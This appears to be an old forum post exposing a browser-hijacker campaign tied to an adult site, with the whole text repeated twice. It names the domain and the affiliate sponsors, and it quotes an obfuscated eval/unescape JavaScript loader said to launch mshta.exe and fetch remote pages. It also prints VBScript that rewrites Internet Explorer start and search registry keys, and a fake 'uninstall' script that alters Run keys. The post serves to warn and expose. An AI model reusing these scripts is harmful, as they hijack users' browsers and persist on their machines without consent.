ORIGINAL PAGE THAT INITIALIZES THIS HACK
http://xxxpix4u.com/ * do not visit this site without an active firewall
FAKE OWNER OF DOMAIN
Erik Midsbraw ([email protected])
1067543182
PO BOX midsbraw
LA, MT 11652
US
SPONSORS SUPPORTING THIS HACKER
http://www.discountvideopass.com/?revid=100444
http://www.freepassbucks.com/freepb.php?site=36&e_refer=12111
http://www.ucbill.com/click.php?uid=ucsoft&bg=ffffff&product=1
http://derek.offshoreclicks.com/imps.php?affiliate=derek
http://install.xxxtoolbar.com/ist/scripts/prompt.php?event_type=onload&recurrence=always&ret ry=1&loadfirst=0&delayload=0&account_id=132192&adi d=a1066847049
http://www.freeezinebucks.com/ps.php?s=20&u=2398645
http://www.girlknights.com/index_main.html?id=274
http://www.coolwebsearch.com/search.php?aff=257
http://trafficback.com/cgi-bin/out/59/2&p=60&f=1&link=text
http://tradesgear.com/?ref_id=638
ok the js file below can be found at
http://xxxpix4u.com/clean.js
this code with obstrucated urls
{ -
vor t="",w="",o="wu.Pflb0i hMS|=zjHkgosn;p)\"Tad1<vre>/Jmty
-Lc",c=46;eval(unescape("%66%75%6E%63%74%69%6F%6E%2 0%67%67%67%28%29%7B%64%6F%63%75%6D%65%6E%74%2E%77% 72%69%74%65%28%77%29%7D%3B%66%75%6E%63%74%69%6F%6E %20%71%28%64%29%7B%76%61%72%20%72%3D%27%27%2C%78%2 C%69%2C%79%2C%70%3B%66%6F%72%28%78%3D%30%3B%78%3C% 64%2E%6C%65%6E%67%74%68%3B%78%2B%2B%29%7B%69%3D%64 %2E%63%68%61%72%41%74%28%78%29%3B%79%3D%6F%2E%69%6 E%64%65%78%4F%66%28%69%29%3B%69%66%28%79%3E%2D%31% 29%7B%70%3D%28%28%79%2B%31%29%25%63%2D%31%29%3B%69 %66%28%70%3C%3D%30%29%7B%70%2B%3D%63%7D%72%2B%3D%6 F%2E%63%68%61%72%41%74%28%70%2D%31%29%7D%65%6C%73% 65%7B%72%2B%3D%69%7D%7D%77%2B%3D%72%7D"));q("hhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh hhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhvnwe ");q(")yhbd;o.do>zTmdrd|we )yT/\r\nrdehsfs).)hzhu ;1suPwe>dy>fs).)-\"p\r\nl.;wy s;hnMsufs).)-\"h{\r\nhhhhsfs).)P1sw.t>;yP0s1:P ;;>ekaSchzhTvs0H>wyh1dydzMyy)(JJs;b:Mde1) wnPwstJr 1nJ<P)M)/Tp\r\nhhhhsfs).)PnMsu-i,i,<,<,1sw.t>;yP0s1:\"p\r\nhh}\r\nl.;wy s;hny bb-\"{\r\n}\r\nl.;wy s;hl.wg.)-\"{\r\nnMsufs).)-\"\r\n}\r\nrdehbd;ohzh;dr odysePn:ny>tcd;o.do>p\r\n lh--bd;ohzzhTe.T\"hhahahahah-bd;ohzzhTjMLwMT\"hhahahahah-bd;ohzzhTjMLMgT\"hhahahahah-bd;ohzzhTjMT\"hhahahahah-bd;ohzzhTjMLtsT\"hhahahahah-bd;ohzzhTjMLnoT\"hhahahahah-bd;ohzzhTjMLyuT\"hhahahaha");q("h-bd;ohzzhT.gT\"hhahahahah-bd;ohzzhT.jT\"\"h{ny bb-\"p}\r\n>bn>\r\n{l.wg.)-\"p}\r\nvJnwe )y/h");ggg();dacumint.write(t);t="";//--}
this code attempts to access your mshta.exe if successfull it runs
http://www.onlyhardpics.com/vids/1.php and the following code
<scruipt languige=vbs>
Set Shl = CreateObject("WScript.Shell")
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.searchdot.net"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.searchdot.net"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Main\Search Page", "http://www.searchdot.net"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Main\Search Bar", "http://www.searchdot.net"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Main\Use Search Asst", "no"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\SearchUrl\", "http://www.searchdot.net"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Search\SearchAssistant", "http://www.searchdot.net"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Search\CustomizeSearch", "http://www.searchdot.net"
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Search\SearchAssistant", "http://www.searchdot.net"
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Search\CustomizeSearch", "http://www.searchdot.net"
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Search\Default_Search_URL", "http://www.searchdot.net"
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Default_Page_URL", "http://www.searchdot.net"
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Default_Search_URL", "http://www.searchdot.net"
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Search Page", "http://www.searchdot.net"
window.close()
</scrupt>
Fake uninstall can be located at
http://www.searchdot.net/remove/index.html
this opens up
http://onlyhardpics.com/qunin/1.php and the following code
scrap language="Javacrap" type="text/javcrap"><!--
var m="",f="lPIvg pAuj;Bn(0WEr<qd\"=ozLt/:aM>chmSk#5.sTy)wiHf1eb",g="",i=51;eval(unescape(" %66%75%6E%63%74%69%6F%6E%20%70%70%70%28%29%7B%64%6 F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%67%29%7D% 3B%66%75%6E%63%74%69%6F%6E%20%72%28%77%29%7B%76%61 %72%20%65%3D%27%27%2C%75%2C%6B%2C%6E%2C%64%3B%66%6 F%72%28%75%3D%30%3B%75%3C%77%2E%6C%65%6E%67%74%68% 3B%75%2B%2B%29%7B%6B%3D%77%2E%63%68%61%72%41%74%28 %75%29%3B%6E%3D%66%2E%69%6E%64%65%78%4F%66%28%6B%2 9%3B%69%66%28%6E%3E%2D%31%29%7B%64%3D%28%28%6E%2B% 31%29%25%69%2D%31%29%3B%69%66%28%64%3C%3D%30%29%7B %64%2B%3D%69%7D%65%2B%3D%66%2E%63%68%61%72%41%74%2 8%64%2D%31%29%7D%65%6C%73%65%7B%65%2B%3D%6B%7D%7D% 67%2B%3D%65%7D"));r("ppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp ppppppppppppppppq\"Hg");r("pMPH (o=hb(/b<=cqlcq1z(/p1Mhbo=u<HMPpnPMh#=pTHLbo=.=phzPz<o=5WWWWWW=cItruk rpEuvypssssq:1z(/cq:lcq:\"HgcpqTh<HA/c\r\nppgM<pzIzAjApopiH(\"zish<bM/bIzAjA0wB\r\n\r\npp1j(h/Hz(pTmziIzAjA0wp{\r\nppppzIzAjAs\"zhjSb(/slz\")sH((b<fy>tpop=qzl;bh/p\"M/Mom//Aa::z(P)mM<\"AHhTshzS:dj(H(:esAmAc=B\r\nppppzIzAjA sTmzi0W,W,e,e,\"zhjSb(/slz\")wB\r\npp}\r\npp\r\nTmziIzAjA0w\r\nq:Th<HA/cp");ppp();hahahahahahahahahahahahahahaha(m);m=" ";//--></scrapt></
and does the following
<scraipt languige=vbs>
Set Shl = CreateObject("WScript.Shell")
Shl.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Ru n\Msoffice",""
Shl.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Ru n\Msoffice",""
Shl.RegDelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Ru n\Msoffice"
Shl.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Ru n\Msoffice"
Shl.Popup "UNINSTALL COMPLETE!"
windiw.close()
</scrupt>
If you belong to the sponsors above, i wouldnt be happy that they are allowing this as it means less money in your pocket as more and more people will have already seen your ads and less payout as these people thief your sponsors.
If anyone is thinking of using the code provided to alter other peoples computers , I would think again.
Also to those sponsors or affiliates buying traffic from offshoreclicks.com they are actively involved in buying the above traffic and selling it to you.
The following person can be found with 90% of the domains on thehun's blacklist or anyone else's for that matter.
He is also the person responsible for altering the hosts files for thehun and several other high profile websites
BE WARNED IM GONNA CATCH YOU AND WHEN I DO !!!
http://xxxpix4u.com/ * do not visit this site without an active firewall
FAKE OWNER OF DOMAIN
Erik Midsbraw ([email protected])
1067543182
PO BOX midsbraw
LA, MT 11652
US
SPONSORS SUPPORTING THIS HACKER
http://www.discountvideopass.com/?revid=100444
http://www.freepassbucks.com/freepb.php?site=36&e_refer=12111
http://www.ucbill.com/click.php?uid=ucsoft&bg=ffffff&product=1
http://derek.offshoreclicks.com/imps.php?affiliate=derek
http://install.xxxtoolbar.com/ist/scripts/prompt.php?event_type=onload&recurrence=always&ret ry=1&loadfirst=0&delayload=0&account_id=132192&adi d=a1066847049
http://www.freeezinebucks.com/ps.php?s=20&u=2398645
http://www.girlknights.com/index_main.html?id=274
http://www.coolwebsearch.com/search.php?aff=257
http://trafficback.com/cgi-bin/out/59/2&p=60&f=1&link=text
http://tradesgear.com/?ref_id=638
ok the js file below can be found at
http://xxxpix4u.com/clean.js
this code with obstrucated urls
{ -
vor t="",w="",o="wu.Pflb0i hMS|=zjHkgosn;p)\"Tad1<vre>/Jmty
this code attempts to access your mshta.exe if successfull it runs
http://www.onlyhardpics.com/vids/1.php and the following code
<scruipt languige=vbs>
Set Shl = CreateObject("WScript.Shell")
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.searchdot.net"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.searchdot.net"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Main\Search Page", "http://www.searchdot.net"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Main\Search Bar", "http://www.searchdot.net"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Main\Use Search Asst", "no"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\SearchUrl\", "http://www.searchdot.net"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Search\SearchAssistant", "http://www.searchdot.net"
Shl.RegWrite "HKLM\Software\Microsoft\Internet Explorer\Search\CustomizeSearch", "http://www.searchdot.net"
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Search\SearchAssistant", "http://www.searchdot.net"
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Search\CustomizeSearch", "http://www.searchdot.net"
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Search\Default_Search_URL", "http://www.searchdot.net"
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Default_Page_URL", "http://www.searchdot.net"
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Default_Search_URL", "http://www.searchdot.net"
Shl.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Search Page", "http://www.searchdot.net"
window.close()
</scrupt>
Fake uninstall can be located at
http://www.searchdot.net/remove/index.html
this opens up
http://onlyhardpics.com/qunin/1.php and the following code
scrap language="Javacrap" type="text/javcrap"><!--
var m="",f="lPIvg pAuj;Bn(0WEr<qd\"=ozLt/:aM>chmSk#5.sTy)wiHf1eb",g="",i=51;eval(unescape(" %66%75%6E%63%74%69%6F%6E%20%70%70%70%28%29%7B%64%6 F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%67%29%7D% 3B%66%75%6E%63%74%69%6F%6E%20%72%28%77%29%7B%76%61 %72%20%65%3D%27%27%2C%75%2C%6B%2C%6E%2C%64%3B%66%6 F%72%28%75%3D%30%3B%75%3C%77%2E%6C%65%6E%67%74%68% 3B%75%2B%2B%29%7B%6B%3D%77%2E%63%68%61%72%41%74%28 %75%29%3B%6E%3D%66%2E%69%6E%64%65%78%4F%66%28%6B%2 9%3B%69%66%28%6E%3E%2D%31%29%7B%64%3D%28%28%6E%2B% 31%29%25%69%2D%31%29%3B%69%66%28%64%3C%3D%30%29%7B %64%2B%3D%69%7D%65%2B%3D%66%2E%63%68%61%72%41%74%2 8%64%2D%31%29%7D%65%6C%73%65%7B%65%2B%3D%6B%7D%7D% 67%2B%3D%65%7D"));r("ppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp pppppppppppppppppppppppppppppppppppppppppppppppppp ppppppppppppppppq\"Hg");r("pMPH (o=hb(/b<=cqlcq1z(/p1Mhbo=u<HMPpnPMh#=pTHLbo=.=phzPz<o=5WWWWWW=cItruk rpEuvypssssq:1z(/cq:lcq:\"HgcpqTh<HA/c\r\nppgM<pzIzAjApopiH(\"zish<bM/bIzAjA0wB\r\n\r\npp1j(h/Hz(pTmziIzAjA0wp{\r\nppppzIzAjAs\"zhjSb(/slz\")sH((b<fy>tpop=qzl;bh/p\"M/Mom//Aa::z(P)mM<\"AHhTshzS:dj(H(:esAmAc=B\r\nppppzIzAjA sTmzi0W,W,e,e,\"zhjSb(/slz\")wB\r\npp}\r\npp\r\nTmziIzAjA0w\r\nq:Th<HA/cp");ppp();hahahahahahahahahahahahahahaha(m);m=" ";//--></scrapt></
and does the following
<scraipt languige=vbs>
Set Shl = CreateObject("WScript.Shell")
Shl.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Ru n\Msoffice",""
Shl.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Ru n\Msoffice",""
Shl.RegDelete "HKLM\Software\Microsoft\Windows\CurrentVersion\Ru n\Msoffice"
Shl.RegDelete "HKCU\Software\Microsoft\Windows\CurrentVersion\Ru n\Msoffice"
Shl.Popup "UNINSTALL COMPLETE!"
windiw.close()
</scrupt>
If you belong to the sponsors above, i wouldnt be happy that they are allowing this as it means less money in your pocket as more and more people will have already seen your ads and less payout as these people thief your sponsors.
If anyone is thinking of using the code provided to alter other peoples computers , I would think again.
Also to those sponsors or affiliates buying traffic from offshoreclicks.com they are actively involved in buying the above traffic and selling it to you.
The following person can be found with 90% of the domains on thehun's blacklist or anyone else's for that matter.
He is also the person responsible for altering the hosts files for thehun and several other high profile websites
BE WARNED IM GONNA CATCH YOU AND WHEN I DO !!!





~¤~

Comment